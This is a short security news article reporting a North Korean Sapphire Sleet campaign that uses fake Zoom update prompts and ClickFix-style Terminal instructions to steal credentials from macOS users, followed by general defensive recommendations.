North Korea's Sapphire Sleet Deploys ClickFix Attacks on macOS Users

Security researchers have identified a sophisticated campaign by North Korean threat actor Sapphire Sleet targeting macOS users through ClickFix attack vectors. The group, tracked by multiple cybersecurity firms as part of the Lazarus operation, is employing fake job offers and counterfeit Zoom software updates to compromise Apple Mac computers. The attacks leverage social engineering techniques that trick users into executing malicious scripts under the guise of resolving technical issues, ultimately deploying credential-harvesting malware.

The ClickFix technique works by displaying convincing error dialogs that prompt users to run commands in Terminal, ostensibly to fix displayed problems. In these specific attacks, victims encounter fraudulent Zoom update notifications that claim to resolve video conferencing issues. When users follow the instructions, they unknowingly execute AppleScript and shell commands that establish persistence mechanisms and exfiltrate sensitive data including saved passwords, SSH keys, and cryptocurrency wallet information.

Sapphire Sleet, also known as AppleJeus and Hidden Cobras, has historically focused on cryptocurrency theft to fund North Korean government operations. However, this campaign demonstrates expanded targeting beyond financial gain, with the threat actors actively harvesting corporate credentials and intellectual property. The group has been observed using legitimate developer tools like Xcode to obfuscate malicious code and employing fileless execution techniques to evade traditional antivirus solutions.

Organizations with macOS infrastructure should implement robust endpoint detection, restrict Terminal access for non-administrative users, and train employees on identifying social engineering attempts. Security teams are advised to monitor for suspicious Zoom update domains and block execution of scripts downloaded from untrusted sources. This campaign underscores the increasing sophistication of nation-state threat actors in targeting macOS environments, which were previously considered lower risk than Windows deployments.